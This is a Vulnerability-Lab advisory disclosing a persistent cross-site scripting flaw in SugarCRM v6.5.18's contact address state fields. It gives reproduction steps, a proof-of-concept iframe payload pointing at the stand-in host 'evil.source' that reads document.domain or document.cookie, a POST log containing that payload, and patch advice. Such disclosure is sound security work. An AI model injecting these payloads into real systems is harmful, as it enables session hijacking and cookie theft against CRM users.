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vulnerlabVulnerability-Lab - Benjamin Kunz Mejri -
HistoryNov 16, 2020 - 12:00 a.m.

SugarCRM v6.5.18 - Contacts Persistent XSS Vulnerability

Vulnerability-Lab - Benjamin Kunz Mejri -
persistent xss
remote attack
Document Title:
SugarCRM v6.5.18 - Contacts Persistent XSS Vulnerability

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:
Cross Site Scripting - Persistent

Current Estimated Price:
2.000€ - 3.000€

Product & Service Introduction:
SugarCRM empowers your marketing, sales and services teams to collaborate across the entire customer lifecycle for more 
meaningful, memorable experiences. More than 2 million users in 120 countries have switched to SugarCRM to fuel extraordinary 
customer experiences. We have disrupted the market with a relentless pursuit of innovation and visionary solutions, 
bringing the world’s first no-touch, time-aware CX platform. The CX suite aggregates the millions of different data points 
on your customers and turns them into proactive truths, trends and predictions for you to leverage.

(Copy of the Homepage: )

Abstract Advisory Information:
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the official SugarCRM v6.5.18 web-application.

Affected Product(s):
Product: SugarCRM v6.5.18 - CRM (Web-Application)

Vulnerability Disclosure Timeline:
2020-05-03: Researcher Notification & Coordination (Security Researcher)
2020-05-04: Vendor Notification (Security Department)
2020-05-24: Vendor Notification (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Exploitation Technique:

Severity Level:

Authentication Type:
Restricted Authentication (Guest Privileges)

User Interaction:
Low User Interaction

Disclosure Type:
Independent Security Research

Technical Details & Description:
A persistent input validation web vulnerability has been discovered in the official SugarCRM v6.5.18 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to 
compromise browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in the primary address state and alternate address state 
input fields of the sales or support module open to create a contacts. Remote attackers with low privileged 
sugarcrm accounts are able to inject own malicious script code as contact. Higher privileged application user 
accounts will execute the script code on preview of the created contact to e.g gain moderator or administrator 
rights via session hijacking, phishing or further persistent manipulative web attacks. The code does not only 
execute in the same section were the contact is listed or previewed but also after save in the view log function 
context. The attack can thus way be performed via create of a contact or via import of a vcf file contact. 
The request method to inject is POST and the attack is limited to registered user accounts with default 
contact to the contacts module.

The script code is able to bypass the basic validation process because of the primary address state and alternate 
address state are exchanged in the transmit request. Normally in a regular transmit the context is parsed securely.
In the actual case an attacker injects script code in the alternate adress when changing the main adress the wrong 
sanitized code occurs in the front-end.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent 
external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Sales
[+] Support

Vulnerable Input(s):
[+] Primary Address State
[+] Alternate Address State

Vulnerable Parameter(s):
[+] primary address state
[+] alternate address state

Affected Module(s):
[+] Sales - Contact List
[+] Support - Contact List

Proof of Concept (PoC):
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the sugarcrm application
2. Login as low privileged user account
3. Move to sales or support and click to contact, then open create a new contact
4. Inject payload in the other address and primary adress to the  alternate address state and primary state input fields
5. Save the entry and a refresh occurs with the inserted contact details
Note: The script code execute immediatly after saving in the primary adress state and alternate adress state section of both modules
6. Successful reproduce of the persistent cross site scripting web vulnerability!

PoC: Payload
><iframe src=evil.source onload=alert(document.domain)>

PoC: Vulnerable Source
<tr><td scope="col" width="12.5%">
Primary Address:
<td width="37.5%">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<td width="99%">
<input type="hidden" class="sugar_field" id="primary_address_street" value="q">
<input type="hidden" class="sugar_field" id="primary_address_city" value="a">
<input type="hidden" class="sugar_field" id="primary_address_state" value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
<input type="hidden" class="sugar_field" id="primary_address_country" value="y">
<input type="hidden" class="sugar_field" id="primary_address_postalcode" value="p">
</td><td class="dataField" width="1%">
<td scope="col" width="12.5%">
Other Address:</td>
<td width="37.5%">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td width="99%">
<input type="hidden" class="sugar_field" id="alt_address_street" value="n">
<input type="hidden" class="sugar_field" id="alt_address_city" value="a">
<input type="hidden" class="sugar_field" id="alt_address_state" value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
<input type="hidden" class="sugar_field" id="alt_address_country" value="k">
<input type="hidden" class="sugar_field" id="alt_address_postalcode" value="r">
<td class="dataField" width="1%">

--- PoC Session Logs [POST] ---
Host: sugar-crm.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1336
Origin: https://sugar-crm.localhost:8000
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://sugar-crm.localhost:8000/index.php

Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1; PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1; 
PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5; ck_login_id_20=1; ck_login_language_20=en_us; 
e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23
primary_address_state=t<iframe src=evil.source onload=aler(document.cookie)>&primary_address_postalcode=b&
primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe src=evil.source onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0&
Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe src=a>&report_to_name=&
reports_to_id=&sync_contact=0,1&lead_source=Web Site&do_not_call=0&campaign_name=&campaign_id=&
POST: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Location: index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1
Server: Microsoft-IIS/8.5
Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000
ck_login_language_20=en_us;  Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000
sugar_user_theme=Sugar5;  Max-Age=31536000
X-Powered-By: ASP.NET
Content-Length: 231


Solution - Fix & Patch:
The vulnerability can be patched following the next steps ...
1. Restrict the input fields and disallow special chars for the main name values displayed in the list
2. Escape the input transmitted from the alternate and primary inputs
3. Parse and sanitize the ouput location to ensure its filtered securely

Security Risk:
The security risk of the persistent cross site web vulnerability in the sugarcrm web-application is estimated as medium.

Credits & Authors:
Vulnerability-Lab -
Benjamin Kunz Mejri -

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.


Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
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